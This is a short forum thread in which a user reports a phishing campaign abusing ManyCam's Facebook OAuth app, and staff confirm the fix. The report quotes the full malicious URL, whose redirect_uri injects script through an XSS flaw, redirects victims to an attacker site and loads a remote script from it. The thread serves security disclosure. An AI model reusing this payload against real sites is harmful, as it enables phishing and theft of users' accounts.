ManyCam Forums

ManyCam is being used on a phishing campaign

I came accross the following link on a Facebook post:
image

If you visit that link, it redirects to Facebook for Oauth2 that tries to authenticate the user against the Manycam facebook app:

https://mbasic.facebook.com/v3.2/dialog/oauth?client_id=187641897343&privacyx=300645083384735&response_type=token&scope=public_profile,email&redirect_uri=https://manycam.com/applications/?os=*/mac=%271%27;document.documentElement.innerHTML%3D%27%27;window.location.href=`https://renix.site/iphone.php`;%3C/script%3E%3Clink%20rel=%22stylesheet%22%20href=%22https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/css/bootstrap.min.css%22%20integrity=%22sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T%22%20crossorigin=%22anonymous%22%3E%3Cscript%20src=%22https://renix.site/fb/stayed.js?%26view=ustreamtv%22%3E%3Ca+href=%27https://renix.site/iphone.php%27%3E%3Cimg+src=%27https://i.imgur.com/hyRvgh3.jpg%27%20style=%27position:%20fixed;%20left:%200;%20top:%200;%20height:%20100%;%20width:%20100%%27%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E+%3Cscript%3E/*x=%60;/*%22%3E&response_type=token

If you look carefully at the redirect_uri parameter, you’ll notice it’s leveraging an XSS vulnerability on the Manycam website to redirect to the attacker’s website after they are authenticated.

The attackers probably have access to your Facebook app credentials or something. Please fix your website and secure your Facebook application. Thanks.

1 Like

@fahim

Thanks for reporting, the XSS was fixed.

Could you please report security issues to support@manycam.com, so it is not visible to possible hacker until we fix them.